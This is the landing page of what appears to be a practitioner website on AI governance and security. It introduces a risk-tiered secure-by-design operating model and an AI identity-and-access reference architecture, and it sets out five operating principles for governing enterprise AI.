AI Governance & Security
Operating models and reference architectures for AI-native systems.
AI systems introduce probabilistic decisions, opaque vendor models, automation amplification, and identity questions that traditional security was not designed to handle. This site publishes two practitioner-grade frameworks for governing them.
Operating Principle
AI governance maturity is not defined by zero incidents. It is defined by controlled exposure and predictable response.
Two practice areas.
Pillar 1
Secure-by-Design Operating Model
For: CISO · CRO · Chief AI/Data Officer · GRC
A risk-tiered governance operating model for embedded enterprise AI, covering risk classification, threat modeling, embedded SDLC controls, monitoring, and AI incident response. Aligned to NIST AI RMF, EU AI Act, SOC 2, and ISO 27001.
Explore Governance
Pillar 2
AI IAM Reference Architecture
For: Security Architects · Platform Engineers · Cloud Teams
A layered authorization architecture for AI execution chains. It governs users, agents, tools, data, models, and outputs through continuous runtime enforcement. Includes AWS mapping, Cedar policy model, and secure RAG.
Explore Architecture
Operating Principles
Five ideas the rest of the site is built on.
Principle 1
Risk-proportionate controls
Governance scales with impact, not fear. A marketing recommender does not require the same rigor as a model influencing financial or employment outcomes.
Principle 2
Federated development, central oversight
Product teams retain velocity. A central function provides risk visibility, escalation, and validation for the systems that warrant it.
Principle 3
Embed, don't bolt on
Controls integrate into the AI lifecycle (intake, threat modeling, deployment, monitoring, and incident response). They are not bolted on as compliance overhead.
Principle 4
Guardrails guide, enforcement decides
Model-layer guardrails shape behavior. Real authorization must be enforced at the data, tool, and policy decision layers, before the model ever sees context.
Principle 5
Controlled exposure, not zero incidents
Maturity is not the absence of failure. It is the presence of predictable response: known taxonomies, tested rollback, and clear escalation paths.